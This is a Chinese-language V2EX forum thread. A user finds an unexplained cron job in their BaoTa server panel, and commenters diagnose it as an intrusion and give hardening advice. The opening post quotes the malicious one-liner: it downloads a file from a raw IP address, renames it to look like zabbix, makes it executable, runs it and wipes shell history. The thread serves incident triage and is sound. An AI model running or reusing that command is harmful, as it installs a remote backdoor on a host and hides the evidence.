V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
angry41
V2EX  ›  问与答

我的宝塔面板里突然多了一个计划任务

  •  
  •   angry41 · 343 天前 · 2139 次点击
    这是一个创建于 343 天前的主题,其中的信息可能已经有所发展或是发生改变。

    wget http://103.122.247.146/seo.txt && mv seo.txt zabbix && chmod +x zabbix && ./zabbix && history -cw

    15 条回复    2024-01-12 11:04:47 +08:00
    angry41
        1
    angry41  
    OP
       343 天前
    wget http://103.122.247.146/seo.txt:这个命令会使用 wget 工具下载一个名为 seo.txt 的文件从 http://103.122.247.146 这个地址。

    &&:这个符号表示在前一个命令成功执行后才执行下一个命令。

    mv seo.txt zabbix:将下载的 seo.txt 文件重命名为 zabbix 。

    &&:再次使用 && 连接,执行下一个命令。

    chmod +x zabbix:给 zabbix 文件添加可执行权限。

    &&:再次使用 && 连接,执行下一个命令。

    ./zabbix:运行名为 zabbix 的文件。

    &&:再次使用 && 连接,执行下一个命令。

    history -cw:清除命令历史记录。
    hefish
        2
    hefish  
       343 天前
    宝塔这东西,感觉放公网有些危险,前端最好再弄一层认证。
    或者在内网测试用用。
    跑生产的话,感觉还是不用为妙。
    yidinghe
        3
    yidinghe  
       343 天前   ❤️ 1
    "mv seo.txt zabbix && chmod +x zabbix && ./zabbix" 这段就是打算执行这个文件了。这个 seo.txt 本质上是个可执行文件,目的可能是寻求系统漏洞,安装后门之类的。
    yidinghe
        4
    yidinghe  
       343 天前
    顺便说下,PHP 开发的东西出现漏洞的几率比其他语言大很多,所以连开源软件我向来都是避开 PHP
    Allenqjy
        5
    Allenqjy  
       343 天前
    玩票项目才会用宝塔,要长期运转的项目绝对不装任何面板
    CoderLife
        6
    CoderLife  
       343 天前
    从来不用 bt 这些玩意儿
    Bingchunmoli
        7
    Bingchunmoli  
       343 天前 via Android
    宝塔有云控,权限不再自己这边,所以一般不用的
    Erroad
        8
    Erroad  
       343 天前
    文件头 ELF ,下载了个可执行文件执行了
    dnslint
        9
    dnslint  
       343 天前
    10M 带宽的机器
    9i5NngJHI4P7dm42
        10
    9i5NngJHI4P7dm42  
       343 天前
    宝塔? 生怕自己不变肉鸡是吧
    woshinide300yuan
        11
    woshinide300yuan  
       342 天前
    @yidinghe 就你一个人回答问题,我真是笑了。


    ========
    计划任务里出任何东西都是被黑了,正常不存在的,备份数据然后重装吧。
    另外可以考虑除了必要端口外,都在云控制面板里锁死登录 IP 。
    我自己是 80 和 443 以外,都仅限个人电脑或者一台吃灰 windows 云登录,过去这 6 7 年没什么安全问题,哪怕密码就是 123456qweR
    WashFreshFresh
        12
    WashFreshFresh  
       341 天前
    @woshinide300yuan 个人的 ip 不是会变吗,你总不能每次变了后再改配置吧。
    woshinide300yuan
        13
    woshinide300yuan  
       341 天前
    @WashFreshFresh 我不是写俩条件吗。 但的确每次重启后会再配置,所以我家路由器几个月不重启一次。
    woshinide300yuan
        14
    woshinide300yuan  
       341 天前
    @WashFreshFresh 就是去阿里云后台改个安全组 IP ,其他的不变。
    esile
        15
    esile  
       341 天前 via Android
    @Bingchunmoli 听说可以免密登录任何后台
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1121 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 18:34 · PVG 02:34 · LAX 10:34 · JFK 13:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.